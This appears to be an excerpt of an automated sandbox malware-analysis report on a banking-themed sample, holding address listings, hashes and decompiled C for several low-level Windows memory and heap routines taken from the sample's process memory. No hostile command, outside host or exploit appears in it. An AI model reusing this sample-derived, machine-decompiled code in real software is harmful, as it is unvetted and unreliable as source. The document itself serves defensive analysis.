                                                                    0x018af0e2
                                                                    0x018aefdf
                                                                    0x018aefdf
                                                                    0x018aefdf
                                                                    0x018aefe5
                                                                    0x018fbafc
                                                                    0x018fbafc
                                                                    0x018aefe5
                                                                    0x018aefeb
                                                                    0x018aefed
                                                                    0x018af00f
                                                                    0x018af011
                                                                    0x018af01a
                                                                    0x018af01d
                                                                    0x018af021
                                                                    0x018af028
                                                                    0x018af029
                                                                    0x018af029
                                                                    0x018af02c
                                                                    0x00000000
                                                                    0x018af02c
                                                                    0x018aeff3
                                                                    0x018aeff9
                                                                    0x018af0ea
                                                                    0x018af0ed
                                                                    0x018af0ef
                                                                    0x00000000
                                                                    0x018af0ef
                                                                    0x018af003
                                                                    0x018fbb12
                                                                    0x018af045
                                                                    0x018af049
                                                                    0x018af051
                                                                    0x018af09e
                                                                    0x018af0a0
                                                                    0x018af0a0
                                                                    0x018af09e
                                                                    0x018af053
                                                                    0x018af064
                                                                    0x018af064
                                                                    0x018af06b
                                                                    0x018fbb1a
                                                                    0x018fbb1a
                                                                    0x018af071
                                                                    0x018af071
                                                                    0x018af07d
                                                                    0x018af082
                                                                    0x018af08f
                                                                    0x018af08f
                                                                    0x018af009
                                                                    0x018af00d
                                                                    0x00000000
                                                                    0x018af00d
                                                                    0x018aefd0
                                                                    0x018aef97
                                                                    0x018aefa5
                                                                    0x018aefaa
                                                                    0x00000000
                                                                    0x018aefac
                                                                    0x018aefac
                                                                    0x018aefac
                                                                    0x00000000
                                                                    0x018aefb2
                                                                    0x018af036
                                                                    0x018af03a
                                                                    0x018af040
                                                                    0x018af090
                                                                    0x00000000
                                                                    0x018af092
                                                                    0x018af042
                                                                    0x00000000
                                                                    0x018af042
                                                                    0x018aefb7
                                                                    0x018aefb9
                                                                    0x018aefbc
                                                                    0x018aefb0
                                                                    0x018aefb0
                                                                    0x00000000
                                                                    0x018aefbe
                                                                    0x018aefbe
                                                                    0x018aefc1
                                                                    0x00000000
                                                                    0x018aefc1
                                                                    0x018aefbc
                                                                    0x018aefaa
                                                                    0x018aef91

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                                                    • Instruction ID: a286ff161d7f00467cd8f7b90f9f21ad50f4aa1ca1790157c2873ccac02af892
                                                                    • Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                                                    • Instruction Fuzzy Hash: 8051E130A04249DFFB25CB6CC0D07AEBBB1EF05318F5881A8D645D7282D375AB89C751
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 84%
                                                                    			E0196740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
                                                                    				signed short* _v8;
                                                                    				intOrPtr _v12;
                                                                    				intOrPtr _t55;
                                                                    				void* _t56;
                                                                    				intOrPtr* _t66;
                                                                    				intOrPtr* _t69;
                                                                    				void* _t74;
                                                                    				intOrPtr* _t78;
                                                                    				intOrPtr* _t81;
                                                                    				intOrPtr* _t82;
                                                                    				intOrPtr _t83;
                                                                    				signed short* _t84;
                                                                    				intOrPtr _t85;
                                                                    				signed int _t87;
                                                                    				intOrPtr* _t90;
                                                                    				intOrPtr* _t93;
                                                                    				intOrPtr* _t94;
                                                                    				void* _t98;
                                                                    
                                                                    				_t84 = __edx;
                                                                    				_t80 = __ecx;
                                                                    				_push(__ecx);
                                                                    				_push(__ecx);
                                                                    				_t55 = __ecx;
                                                                    				_v8 = __edx;
                                                                    				_t87 =  *__edx & 0x0000ffff;
                                                                    				_v12 = __ecx;
                                                                    				_t3 = _t55 + 0x154; // 0x154
                                                                    				_t93 = _t3;
                                                                    				_t78 =  *_t93;
                                                                    				_t4 = _t87 + 2; // 0x2
                                                                    				_t56 = _t4;
                                                                    				while(_t78 != _t93) {
                                                                    					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
                                                                    						L4:
                                                                    						_t78 =  *_t78;
                                                                    						continue;
                                                                    					} else {
                                                                    						_t7 = _t78 + 0x18; // 0x18
                                                                    						if(E018ED4F0(_t7, _t84[2], _t87) == _t87) {
                                                                    							_t40 = _t78 + 0xc; // 0xc
                                                                    							_t94 = _t40;
                                                                    							_t90 =  *_t94;
                                                                    							while(_t90 != _t94) {
                                                                    								_t41 = _t90 + 8; // 0x8
                                                                    								_t74 = E018DF380(_a4, _t41, 0x10);
                                                                    								_t98 = _t98 + 0xc;
                                                                    								if(_t74 != 0) {
                                                                    									_t90 =  *_t90;
                                                                    									continue;
                                                                    								}
                                                                    								goto L12;
                                                                    							}
                                                                    							_t82 = L018B4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
                                                                    							if(_t82 != 0) {
                                                                    								_t46 = _t78 + 0xc; // 0xc
                                                                    								_t69 = _t46;
                                                                    								asm("movsd");
                                                                    								asm("movsd");
                                                                    								asm("movsd");
                                                                    								asm("movsd");
                                                                    								_t85 =  *_t69;
                                                                    								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
                                                                    									L20:
                                                                    									_t82 = 3;
                                                                    									asm("int 0x29");
                                                                    								}
                                                                    								 *((intOrPtr*)(_t82 + 4)) = _t69;
                                                                    								 *_t82 = _t85;
                                                                    								 *((intOrPtr*)(_t85 + 4)) = _t82;
                                                                    								 *_t69 = _t82;
                                                                    								 *(_t78 + 8) =  *(_t78 + 8) + 1;
                                                                    								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
                                                                    								goto L11;
                                                                    							} else {
                                                                    								L18:
                                                                    								_push(0xe);
                                                                    								_pop(0);
                                                                    							}
                                                                    						} else {
                                                                    							_t84 = _v8;
                                                                    							_t9 = _t87 + 2; // 0x2
                                                                    							_t56 = _t9;
                                                                    							goto L4;
                                                                    						}
                                                                    					}
                                                                    					L12:
                                                                    					return 0;
                                                                    				}
                                                                    				_t10 = _t87 + 0x1a; // 0x1a
                                                                    				_t78 = L018B4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
                                                                    				if(_t78 == 0) {
                                                                    					goto L18;
                                                                    				} else {
                                                                    					_t12 = _t87 + 2; // 0x2
                                                                    					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
                                                                    					_t16 = _t78 + 0x18; // 0x18
                                                                    					E018DF3E0(_t16, _v8[2], _t87);
                                                                    					 *((short*)(_t78 + _t87 + 0x18)) = 0;
                                                                    					_t19 = _t78 + 0xc; // 0xc
                                                                    					_t66 = _t19;
                                                                    					 *((intOrPtr*)(_t66 + 4)) = _t66;
                                                                    					 *_t66 = _t66;
                                                                    					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
                                                                    					_t81 = L018B4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
                                                                    					if(_t81 == 0) {
                                                                    						goto L18;
                                                                    					} else {
                                                                    						_t26 = _t78 + 0xc; // 0xc
                                                                    						_t69 = _t26;
                                                                    						asm("movsd");
                                                                    						asm("movsd");
                                                                    						asm("movsd");
                                                                    						asm("movsd");
                                                                    						_t85 =  *_t69;
                                                                    						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
                                                                    							goto L20;
                                                                    						} else {
                                                                    							 *((intOrPtr*)(_t81 + 4)) = _t69;
                                                                    							 *_t81 = _t85;
                                                                    							 *((intOrPtr*)(_t85 + 4)) = _t81;
                                                                    							 *_t69 = _t81;
                                                                    							_t83 = _v12;
                                                                    							 *(_t78 + 8) = 1;
                                                                    							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
                                                                    							_t34 = _t83 + 0x154; // 0x1ba
                                                                    							_t69 = _t34;
                                                                    							_t85 =  *_t69;
                                                                    							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
                                                                    								goto L20;
                                                                    							} else {
                                                                    								 *_t78 = _t85;
                                                                    								 *((intOrPtr*)(_t78 + 4)) = _t69;
                                                                    								 *((intOrPtr*)(_t85 + 4)) = _t78;
                                                                    								 *_t69 = _t78;
                                                                    								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
                                                                    							}
                                                                    						}
                                                                    						goto L11;
                                                                    					}
                                                                    				}
                                                                    				goto L12;
                                                                    			}





















                                                                    0x0196740d
                                                                    0x0196740d
                                                                    0x01967412
                                                                    0x01967413
                                                                    0x01967416
                                                                    0x01967418
                                                                    0x0196741c
                                                                    0x0196741f
                                                                    0x01967422
                                                                    0x01967422
                                                                    0x01967428
                                                                    0x0196742a
                                                                    0x0196742a
                                                                    0x01967451
                                                                    0x01967432
                                                                    0x0196744f
                                                                    0x0196744f
                                                                    0x00000000
                                                                    0x01967434
                                                                    0x01967438
                                                                    0x01967443
                                                                    0x01967517
                                                                    0x01967517
                                                                    0x0196751a
                                                                    0x01967535
                                                                    0x01967520
                                                                    0x01967527
                                                                    0x0196752c
                                                                    0x01967531
                                                                    0x01967533
                                                                    0x00000000
                                                                    0x01967533
                                                                    0x00000000
                                                                    0x01967531
                                                                    0x0196754b
                                                                    0x0196754f
                                                                    0x0196755c
                                                                    0x0196755c
                                                                    0x0196755f
                                                                    0x01967560
                                                                    0x01967561
                                                                    0x01967562
                                                                    0x01967563
                                                                    0x01967568
                                                                    0x0196756a
                                                                    0x0196756c
                                                                    0x0196756d
                                                                    0x0196756d
                                                                    0x0196756f
                                                                    0x01967572
                                                                    0x01967574
                                                                    0x01967577
                                                                    0x0196757c
                                                                    0x0196757f
                                                                    0x00000000
                                                                    0x01967551
                                                                    0x01967551
                                                                    0x01967551
                                                                    0x01967553
                                                                    0x01967553
                                                                    0x01967449
                                                                    0x01967449
                                                                    0x0196744c
                                                                    0x0196744c
                                                                    0x00000000
                                                                    0x0196744c
                                                                    0x01967443
                                                                    0x0196750e
                                                                    0x01967514
                                                                    0x01967514
                                                                    0x01967455
                                                                    0x01967469
                                                                    0x0196746d
                                                                    0x00000000
                                                                    0x01967473
                                                                    0x01967473
                                                                    0x01967476
                                                                    0x01967480
                                                                    0x01967484
                                                                    0x0196748e
                                                                    0x01967493
                                                                    0x01967493
                                                                    0x01967496
                                                                    0x01967499
                                                                    0x019674a1
                                                                    0x019674b1
                                                                    0x019674b5
                                                                    0x00000000
                                                                    0x019674bb
                                                                    0x019674c1
                                                                    0x019674c1
                                                                    0x019674c4
                                                                    0x019674c5
                                                                    0x019674c6
                                                                    0x019674c7
                                                                    0x019674c8
                                                                    0x019674cd
                                                                    0x00000000
                                                                    0x019674d3
                                                                    0x019674d3
                                                                    0x019674d6
                                                                    0x019674d8
                                                                    0x019674db
                                                                    0x019674dd
                                                                    0x019674e0
                                                                    0x019674e7
                                                                    0x019674ee
                                                                    0x019674ee
                                                                    0x019674f4
                                                                    0x019674f9
                                                                    0x00000000
                                                                    0x019674fb
                                                                    0x019674fb
                                                                    0x019674fd
                                                                    0x01967500
                                                                    0x01967503
                                                                    0x01967505
                                                                    0x01967505
                                                                    0x019674f9
                                                                    0x00000000
                                                                    0x019674cd
                                                                    0x019674b5
                                                                    0x00000000

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                                                    • Instruction ID: cd82a2b71941914f0659f9842c41c3a84cee0d896b2db714b1f9d0e727d79112
                                                                    • Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                                                    • Instruction Fuzzy Hash: D551A071500646DFDB1ACF58C580A95BBB9FF45309F15C1AAE908DF212E371EA46CFA0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 97%
                                                                    			E018C2990() {
                                                                    				signed int* _t62;
                                                                    				signed int _t64;
                                                                    				intOrPtr _t66;
                                                                    				signed short* _t69;
                                                                    				intOrPtr _t76;
                                                                    				signed short* _t79;
                                                                    				void* _t81;
                                                                    				signed int _t82;
                                                                    				signed short* _t83;
                                                                    				signed int _t87;
                                                                    				intOrPtr _t91;
                                                                    				void* _t98;
                                                                    				signed int _t99;
                                                                    				void* _t101;
                                                                    				signed int* _t102;
                                                                    				void* _t103;
                                                                    				void* _t104;
                                                                    				void* _t107;
                                                                    
                                                                    				_push(0x20);
                                                                    				_push(0x196ff00);
                                                                    				E018ED08C(_t81, _t98, _t101);
                                                                    				 *((intOrPtr*)(_t103 - 0x28)) =  *[fs:0x18];
                                                                    				_t99 = 0;
                                                                    				 *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x1c)))) = 0;
                                                                    				_t82 =  *((intOrPtr*)(_t103 + 0x10));
                                                                    				if(_t82 == 0) {
                                                                    					_t62 = 0xc0000100;
                                                                    				} else {
                                                                    					 *((intOrPtr*)(_t103 - 4)) = 0;
                                                                    					_t102 = 0xc0000100;
                                                                    					 *((intOrPtr*)(_t103 - 0x30)) = 0xc0000100;
                                                                    					_t64 = 4;
                                                                    					while(1) {
                                                                    						 *(_t103 - 0x24) = _t64;
                                                                    						if(_t64 == 0) {
                                                                    							break;
                                                                    						}
                                                                    						_t87 = _t64 * 0xc;
                                                                    						 *(_t103 - 0x2c) = _t87;
                                                                    						_t107 = _t82 -  *((intOrPtr*)(_t87 + 0x1871664));
                                                                    						if(_t107 <= 0) {
                                                                    							if(_t107 == 0) {
                                                                    								_t79 = E018DE5C0( *((intOrPtr*)(_t103 + 0xc)),  *((intOrPtr*)(_t87 + 0x1871668)), _t82);
                                                                    								_t104 = _t104 + 0xc;
                                                                    								__eflags = _t79;
                                                                    								if(__eflags == 0) {
                                                                    									_t102 = E019151BE(_t82,  *((intOrPtr*)( *(_t103 - 0x2c) + 0x187166c)),  *((intOrPtr*)(_t103 + 0x14)), _t99, _t102, __eflags,  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
                                                                    									 *((intOrPtr*)(_t103 - 0x30)) = _t102;
                                                                    									break;
                                                                    								} else {
                                                                    									_t64 =  *(_t103 - 0x24);
                                                                    									goto L5;
                                                                    								}
                                                                    								goto L13;
                                                                    							} else {
                                                                    								L5:
                                                                    								_t64 = _t64 - 1;
                                                                    								continue;
                                                                    							}
                                                                    						}
                                                                    						break;
                                                                    					}
                                                                    					 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
                                                                    					__eflags = _t102;
                                                                    					if(_t102 < 0) {
                                                                    						__eflags = _t102 - 0xc0000100;
                                                                    						if(_t102 == 0xc0000100) {
                                                                    							_t83 =  *((intOrPtr*)(_t103 + 8));
                                                                    							__eflags = _t83;
                                                                    							if(_t83 != 0) {
                                                                    								 *((intOrPtr*)(_t103 - 0x20)) = _t83;
                                                                    								__eflags =  *_t83 - _t99;
                                                                    								if( *_t83 == _t99) {
                                                                    									_t102 = 0xc0000100;
                                                                    									goto L19;
                                                                    								} else {
                                                                    									_t91 =  *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30));
                                                                    									_t66 =  *((intOrPtr*)(_t91 + 0x10));
                                                                    									__eflags =  *((intOrPtr*)(_t66 + 0x48)) - _t83;
                                                                    									if( *((intOrPtr*)(_t66 + 0x48)) == _t83) {
                                                                    										__eflags =  *((intOrPtr*)(_t91 + 0x1c));
                                                                    										if( *((intOrPtr*)(_t91 + 0x1c)) == 0) {
                                                                    											L26:
                                                                    											_t102 = E018C2AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
                                                                    											 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
                                                                    											__eflags = _t102 - 0xc0000100;
                                                                    											if(_t102 != 0xc0000100) {
                                                                    												goto L12;
                                                                    											} else {
                                                                    												_t99 = 1;
                                                                    												_t83 =  *((intOrPtr*)(_t103 - 0x20));
                                                                    												goto L18;
                                                                    											}
                                                                    										} else {
                                                                    											_t69 = E018A6600( *((intOrPtr*)(_t91 + 0x1c)));
                                                                    											__eflags = _t69;
                                                                    											if(_t69 != 0) {
                                                                    												goto L26;
                                                                    											} else {
                                                                    												_t83 =  *((intOrPtr*)(_t103 + 8));
                                                                    												goto L18;
                                                                    											}
                                                                    										}
                                                                    									} else {
                                                                    										L18:
                                                                    										_t102 = E018C2C50(_t83,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)), _t99);
                                                                    										L19:
                                                                    										 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
                                                                    										goto L12;
                                                                    									}
                                                                    								}
                                                                    								L28:
                                                                    							} else {
                                                                    								E018AEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                                                    								 *((intOrPtr*)(_t103 - 4)) = 1;
                                                                    								 *((intOrPtr*)(_t103 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30)) + 0x10)) + 0x48));
                                                                    								_t102 =  *((intOrPtr*)(_t103 + 0x1c));
                                                                    								_t76 = E018C2AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102);
                                                                    								 *((intOrPtr*)(_t103 - 0x1c)) = _t76;
                                                                    								__eflags = _t76 - 0xc0000100;
                                                                    								if(_t76 == 0xc0000100) {
                                                                    									 *((intOrPtr*)(_t103 - 0x1c)) = E018C2C50( *((intOrPtr*)(_t103 - 0x20)),  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102, 1);
                                                                    								}
                                                                    								 *((intOrPtr*)(_t103 - 4)) = _t99;
                                                                    								E018C2ACB();
                                                                    							}
                                                                    						}
                                                                    					}
                                                                    					L12:
                                                                    					 *((intOrPtr*)(_t103 - 4)) = 0xfffffffe;
                                                                    					_t62 = _t102;
                                                                    				}
                                                                    				L13:
                                                                    				return E018ED0D1(_t62);
                                                                    				goto L28;
                                                                    			}





















                                                                    0x018c2990
                                                                    0x018c2992
                                                                    0x018c2997
                                                                    0x018c29a3
                                                                    0x018c29a6
                                                                    0x018c29ab
                                                                    0x018c29ad
                                                                    0x018c29b2
                                                                    0x01905c80
                                                                    0x018c29b8
                                                                    0x018c29b8
                                                                    0x018c29bb
                                                                    0x018c29c0
                                                                    0x018c29c5
                                                                    0x018c29c6
                                                                    0x018c29c6
                                                                    0x018c29cb
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x018c29cd
                                                                    0x018c29d0
                                                                    0x018c29d9
                                                                    0x018c29db
                                                                    0x018c29dd
                                                                    0x018c2a7f
                                                                    0x018c2a84
                                                                    0x018c2a87
                                                                    0x018c2a89
                                                                    0x01905ca1
                                                                    0x01905ca3
                                                                    0x00000000
                                                                    0x018c2a8f
                                                                    0x018c2a8f
                                                                    0x00000000
                                                                    0x018c2a8f
                                                                    0x00000000
                                                                    0x018c29e3
                                                                    0x018c29e3
                                                                    0x018c29e3
                                                                    0x00000000
                                                                    0x018c29e3
                                                                    0x018c29dd
                                                                    0x00000000
                                                                    0x018c29db
                                                                    0x018c29e6
                                                                    0x018c29e9
                                                                    0x018c29eb
                                                                    0x018c29ed
                                                                    0x018c29f3
                                                                    0x018c29f5
                                                                    0x018c29f8
                                                                    0x018c29fa
                                                                    0x018c2a97
                                                                    0x018c2a9a
                                                                    0x018c2a9d
                                                                    0x018c2add
                                                                    0x00000000
                                                                    0x018c2a9f
                                                                    0x018c2aa2
                                                                    0x018c2aa5
                                                                    0x018c2aa8
                                                                    0x018c2aab
                                                                    0x01905cab
                                                                    0x01905caf
                                                                    0x01905cc5
                                                                    0x01905cda
                                                                    0x01905cdc
                                                                    0x01905cdf
                                                                    0x01905ce5
                                                                    0x00000000
                                                                    0x01905ceb
                                                                    0x01905ced
                                                                    0x01905cee
                                                                    0x00000000
                                                                    0x01905cee
                                                                    0x01905cb1
                                                                    0x01905cb4
                                                                    0x01905cb9
                                                                    0x01905cbb
                                                                    0x00000000
                                                                    0x01905cbd
                                                                    0x01905cbd
                                                                    0x00000000
                                                                    0x01905cbd
                                                                    0x01905cbb
                                                                    0x018c2ab1
                                                                    0x018c2ab1
                                                                    0x018c2ac4
                                                                    0x018c2ac6
                                                                    0x018c2ac6
                                                                    0x00000000
                                                                    0x018c2ac6
                                                                    0x018c2aab
                                                                    0x00000000
                                                                    0x018c2a00
                                                                    0x018c2a09
                                                                    0x018c2a0e
                                                                    0x018c2a21
                                                                    0x018c2a24
                                                                    0x018c2a35
                                                                    0x018c2a3a
                                                                    0x018c2a3d
                                                                    0x018c2a42
                                                                    0x018c2a59
                                                                    0x018c2a59
                                                                    0x018c2a5c
                                                                    0x018c2a5f
                                                                    0x018c2a5f
                                                                    0x018c29fa
                                                                    0x018c29f3
                                                                    0x018c2a64
                                                                    0x018c2a64
                                                                    0x018c2a6b
                                                                    0x018c2a6b
                                                                    0x018c2a6d
                                                                    0x018c2a72
                                                                    0x00000000

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: cd44921cf9c053a2442ee208f52684b2e0a44320c62f1cf0f37b9b27020119db
                                                                    • Instruction ID: 2ebfde857ca71bfc20bb75a09ad23401d25770bbc384c77c36d16d35f9b5b6d2
                                                                    • Opcode Fuzzy Hash: cd44921cf9c053a2442ee208f52684b2e0a44320c62f1cf0f37b9b27020119db
                                                                    • Instruction Fuzzy Hash: 56516971A0021ADFDF26DF58C840ADEBBB6BF48B54F058119E905AB290C371DE52CF90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 78%
                                                                    			E018C4D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                                                    				signed int _v12;
                                                                    				char _v176;
                                                                    				char _v177;
                                                                    				char _v184;
                                                                    				intOrPtr _v192;
                                                                    				intOrPtr _v196;
                                                                    				void* __ebx;
                                                                    				void* __edi;
                                                                    				void* __esi;
                                                                    				signed short _t42;
                                                                    				char* _t44;
                                                                    				intOrPtr _t46;
                                                                    				intOrPtr _t50;
                                                                    				char* _t57;
                                                                    				intOrPtr _t59;
                                                                    				intOrPtr _t67;
                                                                    				signed int _t69;
                                                                    
                                                                    				_t64 = __edx;
                                                                    				_v12 =  *0x198d360 ^ _t69;
                                                                    				_t65 = 0xa0;
                                                                    				_v196 = __edx;
                                                                    				_v177 = 0;
                                                                    				_t67 = __ecx;
                                                                    				_v192 = __ecx;
                                                                    				E018DFA60( &_v176, 0, 0xa0);
                                                                    				_t57 =  &_v176;
                                                                    				_t59 = 0xa0;
                                                                    				if( *0x1987bc8 != 0) {
                                                                    					L3:
                                                                    					while(1) {
                                                                    						asm("movsd");
                                                                    						asm("movsd");
                                                                    						asm("movsd");
                                                                    						asm("movsd");
                                                                    						_t67 = _v192;
                                                                    						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
                                                                    						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
                                                                    						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
                                                                    						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
                                                                    						_push( &_v184);
                                                                    						_push(_t59);
                                                                    						_push(_t57);
                                                                    						_push(0xa0);
                                                                    						_push(_t57);
                                                                    						_push(0xf);
                                                                    						_t42 = E018DB0B0();
                                                                    						if(_t42 != 0xc0000023) {
                                                                    							break;
                                                                    						}
                                                                    						if(_v177 != 0) {
                                                                    							L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
                                                                    						}
                                                                    						_v177 = 1;
                                                                    						_t44 = L018B4620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
                                                                    						_t59 = _v184;
                                                                    						_t57 = _t44;
                                                                    						if(_t57 != 0) {
                                                                    							continue;
                                                                    						} else {
                                                                    							_t42 = 0xc0000017;
                                                                    							break;
                                                                    						}
                                                                    					}
                                                                    					if(_t42 != 0) {
                                                                    						_t65 = E0189CCC0(_t42);
                                                                    						if(_t65 != 0) {
                                                                    							L10:
                                                                    							if(_v177 != 0) {
                                                                    								if(_t57 != 0) {
                                                                    									L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
                                                                    								}
                                                                    							}
                                                                    							_t46 = _t65;
                                                                    							L12:
                                                                    							return E018DB640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
                                                                    						}
                                                                    						L7:
                                                                    						_t50 = _a4;
                                                                    						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
                                                                    						if(_t50 != 3) {
                                                                    							if(_t50 == 2) {
                                                                    								goto L8;
                                                                    							}
                                                                    							L9:
                                                                    							if(E018DF380(_t67 + 0xc, 0x1875138, 0x10) == 0) {
                                                                    								 *0x19860d8 = _t67;
                                                                    							}
                                                                    							goto L10;
                                                                    						}
                                                                    						L8:
                                                                    						_t64 = _t57 + 0x28;
                                                                    						E018C4F49(_t67, _t57 + 0x28);
                                                                    						goto L9;
                                                                    					}
                                                                    					_t65 = 0;
                                                                    					goto L7;
                                                                    				}
                                                                    				if(E018C4E70(0x19886b0, 0x18c5690, 0, 0) != 0) {
                                                                    					_t46 = E0189CCC0(_t56);
                                                                    					goto L12;
                                                                    				} else {
                                                                    					_t59 = 0xa0;
                                                                    					goto L3;
                                                                    				}
                                                                    			}




















                                                                    0x018c4d3b
                                                                    0x018c4d4d
                                                                    0x018c4d53
                                                                    0x018c4d58
                                                                    0x018c4d65
                                                                    0x018c4d6c
                                                                    0x018c4d71
                                                                    0x018c4d77
                                                                    0x018c4d7f
                                                                    0x018c4d8c
                                                                    0x018c4d8e
                                                                    0x018c4dad
                                                                    0x018c4db0
                                                                    0x018c4db7
                                                                    0x018c4db8
                                                                    0x018c4db9
                                                                    0x018c4dba
                                                                    0x018c4dbb
                                                                    0x018c4dc1
                                                                    0x018c4dc8
                                                                    0x018c4dcc
                                                                    0x018c4dd5
                                                                    0x018c4dde
                                                                    0x018c4ddf
                                                                    0x018c4de0
                                                                    0x018c4de1
                                                                    0x018c4de6
                                                                    0x018c4de7
                                                                    0x018c4de9
                                                                    0x018c4df3
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x01906c7c
                                                                    0x01906c8a
                                                                    0x01906c8a
                                                                    0x01906c9d
                                                                    0x01906ca7
                                                                    0x01906cac
                                                                    0x01906cb2
                                                                    0x01906cb9
                                                                    0x00000000
                                                                    0x01906cbf
                                                                    0x01906cbf
                                                                    0x00000000
                                                                    0x01906cbf
                                                                    0x01906cb9
                                                                    0x018c4dfb
                                                                    0x01906ccf
                                                                    0x01906cd3
                                                                    0x018c4e32
                                                                    0x018c4e39
                                                                    0x01906ce0
                                                                    0x01906cf2
                                                                    0x01906cf2
                                                                    0x01906ce0
                                                                    0x018c4e3f
                                                                    0x018c4e41
                                                                    0x018c4e51
                                                                    0x018c4e51
                                                                    0x018c4e03
                                                                    0x018c4e03
                                                                    0x018c4e09
                                                                    0x018c4e0f
                                                                    0x018c4e57
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x018c4e1b
                                                                    0x018c4e30
                                                                    0x018c4e5b
                                                                    0x018c4e5b
                                                                    0x00000000
                                                                    0x018c4e30
                                                                    0x018c4e11
                                                                    0x018c4e11
                                                                    0x018c4e16
                                                                    0x00000000
                                                                    0x018c4e16
                                                                    0x018c4e01
                                                                    0x00000000
                                                                    0x018c4e01
                                                                    0x018c4da5
                                                                    0x01906c6b
                                                                    0x00000000
                                                                    0x018c4dab
                                                                    0x018c4dab
                                                                    0x00000000
                                                                    0x018c4dab

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
